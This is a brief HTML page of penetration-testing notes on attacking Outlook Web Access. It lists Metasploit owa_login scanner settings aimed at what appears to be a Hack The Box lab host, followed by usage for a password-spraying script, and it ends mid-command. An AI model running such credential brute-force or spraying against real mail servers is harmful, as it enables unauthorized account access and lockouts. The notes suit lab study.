<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Outlook and OWA</title>
</head><body><b><u><span style="font-size: 12pt"><span style="color: #ff0000">In metasploit use </span></span></u></b><br/>
<br/>
<br/>
For OWA 2003, 2007, 2010, 2013, and 2016<br/>
<br/>
use auxiliary/scanner/http/owa_login<br/>
set RHOST 10.10.10.71<br/>
set RPORT 443<br/>
set username administrator<br/>
set vhost rabbit.htb.local<br/>
<br/>
<br/>
<br/>
<br/>
https://github.com/Greenwolf/Spray<br/>
<br/>
Useage: spray.sh -lync &lt;targetIP&gt; &lt;usernameList&gt; &lt;passwordList&gt; &lt;AttemptsPerLockoutPeriod&gt; &lt;LockoutPeriodInMinutes&gt; &nbsp;<br/>
<br/>
./spray.sh -lync https</body></html>